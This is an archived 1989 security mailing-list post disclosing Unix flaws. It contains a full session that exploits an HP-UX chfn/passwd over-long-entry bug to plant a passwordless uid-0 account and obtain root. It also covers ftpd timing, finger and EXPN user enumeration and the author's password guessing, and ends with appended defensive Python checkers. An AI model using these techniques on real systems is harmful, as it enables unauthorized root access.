The 'Security Digest' Archives (TM)


ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #372 [HP-UX 3.0, YP, ... FLAMES] (1 message, 4530 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/372.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: Ning Zhang <zgdvda!zhang%uni-dortmund.de@RELAY.CS.NET>
To: phage
Date: Sat 07:00:43 18/02/1989 EST
Subject: HP-UX 3.0, YP, ... FLAMES
References: [Thread Prev: 370] [Thread Next: 373] [Message Prev: 370] [Message Next: 373]

Hi, everyone on the list,

Recently I was busy with my work and Chinese New Year, and out of the discussion
of security problems.  Now I have just finished a part of my work and would like
to give something for security discussion.  Don't worry, be happy :-)


1. HP-UX 3.0 Experience

On Friday, we installed an HP 9000/835-SRX-Turbo workstation here.  So, I have
the chance to test the new system.  The graphics performance is very nice.
But it seems HP-UX is the worst operating system here (we also have Ultrix
2.x, 3.0, SunOS 3.5, 4.0, TRACE/UNIX 4.3BSD, UMIPS 3.10, etc.).  The version
of HP-UX is "HP Release A.B3.00.5B" and was delivered in Dec, 88. All the
sendmail, ulimit, yp and passwd/chsh/chfn bugs exist in HP-UX!!!  I remember
Paul Hite at PRC RS, VA, and somebody at HP have told me that the chfn bug
does not affect HP-UX.  Here I enclose the script in which I exploited the chfn bug
on HP-UX 3.0.  It seems the chfn program of HP-UX has checked the length of
the GCOS field somewhere.  So the old method described in my chfn bug report
doesn't work directly.  But when I used the command sequence below, the bug
still occurs.  If the account has no password, the chfn & passwd commands are
enough, because the chfn command allows a BUFSIZ-n (0 < n < 13) length password
entry, and after the password is added, the password entry becomes over-long!

If you don't like to see the hacking code, please skip to the next section.

Script started on Sat Feb 18 01:14:30 1989
$ csh
% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:QWOovvLrOrb.E:100:10::/usr/guest:/bin/rsh
% chsh guest /bin/sh
% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:QWOovvLrOrb.E:100:10::/usr/guest:/bin/sh
% chfn
Default values are printed inside of of '[]'.
To accept the default, type <return>.
To have a blank entry, type the word 'none'.

Name []: 1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111
Location (Ex: 42U-J4) []: 11111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111
Office Phone (Ex: 1632) []: 1111
Home Phone (Ex: 9875432) []: 11111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111

% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:QWOovvLrOrb.E:100:10:1111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111,11111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111,1111,1111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111:/usr/guest:/bin/sh
% grep guest /etc/passwd | wc
      1      1   1024
% chsh guest bin/csh
% grep guest /etc/passwd | wc
      1      1   1025
% passswd guest
Old password:
New password:
Re-enter new password:
% cat /etc/passwd
root:vdNPtcyOZKFAU:0:1::/:/bin/sh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
news:*:3:12:placeholder for future:/:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:1::/usr/spool/uucppublic:/usr/lib/uucp/uucico
nuucp:*:6:1:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:9:2::/usr/spool/lp:/bin/sh
games:*:19:1:placeholder for future:/usr/games:/bin/rsh
sync:*:20:1::/:/bin/sync
anon:*:21:5:placeholder for future:/:/bin/sync
notes:*:23:5:placeholder for future:/:/bin/sh
hpdb:*:27:2:ALLBASE:/:/bin/sh
who:*:90:1::/:/bin/who
date:*:91:1::/:/bin/date
guest:wYqJJaf5ecYGw:100:10:1111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111,11111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111,1111,1111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111:/usr/guest:/bin/cs
h::0:0:::
::0:0:::
% su h
# echo > /etc/junk
/etc/junk: restricted
# echo > /tmp/junk
/tmp/junk: restricted
# cd /tmp
cd: restricted
# csh
# echo > /etc/junk
# echo > /tmp/junk
# ls -lag /etc/junk /tmp/junk
-rw-rw-rw-   1 root     root           0 Feb 18 01:22 /etc/junk
-rw-rw-rw-   1 root     root           0 Feb 18 01:21 /tmp/junk
# rm /etc/junk /tmp/junk
# exit
# exit
% exit
$ exit
script done on Sat Feb 18 01:24:35 1989


2. YP bug again!

About the yp bug, as I suggested before, it should limit the length of the
encrypted password field.  Bobby Bodenheimer at Caltech has pointed out
that even when the correct fix was installed for the chfn bug I found two
months ago, Sun's fix of yppasswdd still causes a security problem, because
it checks for bad chars and converts them to '$' to identify the bad
guy, but does not limit the length of the encrypted password field. What
I want to say here is: although the bad guy inserting the over-long password
can not change his password any more, after somebody else changes
his password or the bad guy can access another account, the bad password
entry will occur again. This can be done without the help of the chfn and/or
chsh commands! A good solution to the similar chfn attack is to rewrite
all the get/putpwent related stuff again.


3. Other old bugs

The 'ulimit' bug exists in HP-UX 3.0 and MIPSCo's UMIPS 3.10, the sendmail
bugs in Ultrix (3.0 has not been tested), HP-UX and SunOS 3.x, the /dev/?mem
bug in many UNIX systems, etc. As far as I know, these bugs were all fixed by UCB
several years ago. My question is, why are some vendors so lazy about fixing those
known security problems? UCB is a good example for those vendors, though it is
a non-PROFIT research institute. It seems that bad programming style has
caused many security problems. I've learnt a lot of things from those bugs.


4. Other possible problems

Maybe someone thinks the following problems are not important; if so, please
ignore them.

One thing I've talked about with Keith Bostic of UCB is the response of the FTP
daemon to an invalid user name. I've done some tests on the response time
of /bin/login and /etc/ftpd on Ultrix in China. The result showed that the
response of /etc/ftpd is much faster than that of /bin/login. Now, by looking into
the code of 4.3BSD ftpd picked up from EUnet, I found the reason. When
ftpd finds the user name (using telnet hostname 23 to talk with ftpd directly)
is invalid, it gives a reply at once, and does not ask for and encrypt the password
further as /bin/login does, with a considerable delay. I think the VAX/VMS
TCP Server 2.4 does a good job in this aspect.

About fingerd: a few years ago, one hacking student, using fingerd on a SUN,
stole a sysadmin's password stored in .netrc (which is very convenient
for FTP, rexec, rcmd, etc. By reading Gene Spafford's Internet Worm
report, it seems the worm has not exploited the .netrc file) and broke
into a VAX-11/785.  Please clear the password stored in .netrc, because there
are other possible ways to steal your password.

Again on fingerd, I think it gives much info about users. We also made some
experiments on a PDP-11/23 running UNIX V6 to test how students choose their
passwords.  The result showed that birthday & place, name, room number,
friend's name etc., or some combinations of them, were frequently used as
passwords.  When I got this result, I tried to guess passwords on a VAX-11/785
which is only accessed by the institute staff and some grad students, and
I succeeded many times. The best way in an untrusted environment is to
disable the finger service.

The sendmail program is another quick way to get user names. This can
be done with the EXPN command. One bad thing is that the VAX/VMS Mail Server
2.4 gives a list of all user names in the VAX Cluster when it gets the
EXPN command.

Fake mail is also a problem. I just read on netnews that someone
used a fake address (apollo@berkeley.edu) to send a message to the rec.music.misc
newsgroup, which caused some pop fans' replies to appear on the Apollo mail list :-)


5. FLAMES -- Is this the good strategy for security?

If you don't like flames, please skip the following.

FLAMES ON --- Multiflow TRACE/UNIX 4.3BSD is NOT shipped with CRYPT(3)

Recently, my work has been to build a graphics application server on a TRACE-7/300
which is called by users on the client machines, for a distributed graphics
system model. The server does the very heavy calculation and I planned
to implement a kind of authentication which only allows some valid users
to call the server, by verifying the password and uid/gid.  But a very
strange thing is that TRACE/UNIX 4.3BSD is NOT shipped with the standard
C library function CRYPT(3), so I have no way to implement my original
plan.  I asked the sales representative of Multiflow in Germany; he also has
no idea about that. I know the USA government forbids the export of DES
products out of the USA, except object code for authentication purposes
only.  Although there is no crypt(1) command in the UNIX systems shipped
from the USA, the login(1) and su(1) commands and the crypt(3) functions are
always included, except in TRACE/UNIX. Why does the poor guy outside of the USA
have such inconvenience?  Maybe somebody is aware that the speed of the minisuper
can be used by some crackers to break passwords; some things should be clarified:

o Our TRACE-7/300 can only be accessed by some really trusty researchers
  here, nobody is a cracker.

o MIPSCo M120, HP-9000/835 and TRACE-7/300 have almost the same integer
  performance (Dhrystone = 15000), and the first two machines DO have the
  CRYPT(3) functions.

o If you really are aware of the speed problem, you can make changes to
  the DES algorithm and slow it down.

o As far as I know, the DES source code is floating around the world. Our UNIX
  machines made in Germany DO have the crypt(1) command. The fast DES
  algorithm that came along with the Worm source code is also floating around
  Europe, at least.

Sigh!

Can anybody give us some help with the crypt(3) functions?
Thanks in advance!

FLAMES OFF!


Oh..., God, I think I've talked too much and I'm not sure all I said is right.
My brain seems damaged :-) If my opinions cause some inconvenience to you,
please forgive me.

It's time to go home, I need sleep :-)

Goodbye,

Ning Zhang
<relay.cs.net!uka!unido!zgdvda!zhang>		Oh...God,
<pyramid.pyramid.com!tub!unido!zgdvda!zhang>		It's another bug...
<pyramid.pyramid.com!pcsbst!unido!zgdvda!zhang>
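Editor's added example (not code from the post, nor from HP-UX or Sun): a small auditor for the 7-field passwd(5) format that flags the symptoms sections 1 and 2 describe, namely an entry long enough to be split by a BUFSIZ-sized getpwent(3) buffer, an empty or over-long encrypted password field (the yppasswdd point), and uid-0 entries other than root such as the `h::0:0:::` remainder in the session above. BUFSIZ=1024 and the 13-character DES crypt(3) hash length are assumptions; the sample passwd text is constructed.

```python
import re

# Assumed constants: the getpwent(3) line buffer on the systems the post
# discusses, and the length of a classic 2-char-salt DES crypt(3) hash.
BUFSIZ = 1024
DES_HASH_LEN = 13
NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_-]*")

def audit_passwd(text, max_line=BUFSIZ):
    """Return a list of (line_number, code) findings for passwd(5)-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line:
            continue
        # fgets(buf, BUFSIZ) holds at most BUFSIZ-1 chars.  An entry whose
        # text plus newline does not fit is split, and the tail of the line is
        # parsed as a separate entry on the next read.
        if len(line) + 1 >= max_line:
            findings.append((lineno, "overlong_entry"))
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "bad_field_count"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not NAME_RE.fullmatch(name):
            findings.append((lineno, "bad_name"))
        if pw == "":
            findings.append((lineno, "empty_password"))
        elif pw != "*" and len(pw) > DES_HASH_LEN:
            # The field a DES crypt(3) writes is fixed length; anything longer
            # was injected, not produced by passwd(1).
            findings.append((lineno, "overlong_password_field"))
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((lineno, "non_numeric_id"))
        elif uid == "0" and name != "root":
            findings.append((lineno, "extra_uid0"))
        if home == "" or shell == "":
            findings.append((lineno, "empty_home_or_shell"))
    return findings

def codes_for(findings, lineno):
    """Set of finding codes raised for one line number."""
    return {code for ln, code in findings if ln == lineno}

# Constructed sample: a sane root entry, a locked account, a guest entry with a
# 1000-char GCOS field, and the two fragments a split line leaves behind.
SAMPLE = "\n".join([
    "root:" + "x" * 13 + ":0:1::/:/bin/sh",
    "daemon:*:1:1::/:/bin/sh",
    "guest:" + "x" * 13 + ":100:10:" + "1" * 1000 + ":/usr/guest:/bin/cs",
    "h::0:0:::",
    "::0:0:::",
]) + "\n"

if __name__ == "__main__":
    for ln, code in audit_passwd(SAMPLE):
        print(f"line {ln}: {code}")
```

Run it against a real file with `audit_passwd(open("/etc/passwd").read())`; anything reported as `extra_uid0` or `overlong_entry` deserves a look before the next password change turns a long GCOS field into a new root account.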

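Editor's added example for the ftpd/login timing point in section 4 (not code from the post or from 4.3BSD): two login checkers over a constructed user table. One replies at once for an unknown name, the behaviour the post attributes to 4.3BSD ftpd, which lets a caller tell valid names from invalid ones by response time; the other always performs the password hash, against a decoy record when the name is unknown, and returns the same generic result either way. PBKDF2 stands in for crypt(3); the user table, salts and iteration count are constructed values, and hash evaluations are counted so the difference is visible without timing measurements.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # constructed work factor, stands in for crypt(3)

def _hash(password: bytes, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password, salt, ITERATIONS)

# Constructed user table: name -> (salt, hash).
_ALICE_SALT = b"constructed-salt-alice"
USERS = {"alice": (_ALICE_SALT, _hash(b"correct horse", _ALICE_SALT))}

# Decoy record for unknown names: a random secret nobody knows, so it never matches.
_DECOY_SALT = os.urandom(16)
_DECOY_HASH = _hash(os.urandom(32), _DECOY_SALT)

class _Work:
    """Counts hash evaluations so the behavioural difference is observable."""
    calls = 0

def _hash_counted(password: bytes, salt: bytes) -> bytes:
    _Work.calls += 1
    return _hash(password, salt)

def login_early_reject(user: str, password: bytes) -> bool:
    """Unknown name: answer immediately without hashing.  The fast reply is
    a user-enumeration oracle, which is what the post observed in ftpd."""
    entry = USERS.get(user)
    if entry is None:
        return False
    salt, expected = entry
    return hmac.compare_digest(_hash_counted(password, salt), expected)

def login_uniform(user: str, password: bytes) -> bool:
    """Same work and same generic answer whether or not the name exists."""
    salt, expected = USERS.get(user, (_DECOY_SALT, _DECOY_HASH))
    matched = hmac.compare_digest(_hash_counted(password, salt), expected)
    return matched and user in USERS

def hash_calls(check, user: str, password: bytes):
    """Run one checker; return (result, number of hash evaluations it made)."""
    _Work.calls = 0
    result = check(user, password)
    return result, _Work.calls

if __name__ == "__main__":
    for check in (login_early_reject, login_uniform):
        for name in ("alice", "nobody"):
            print(check.__name__, name, hash_calls(check, name, b"wrong"))
```

The fix is the same one /bin/login of the period applied by accident: do the expensive step regardless of whether the name resolved, and keep the error message identical for both cases.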
END OF DOCUMENT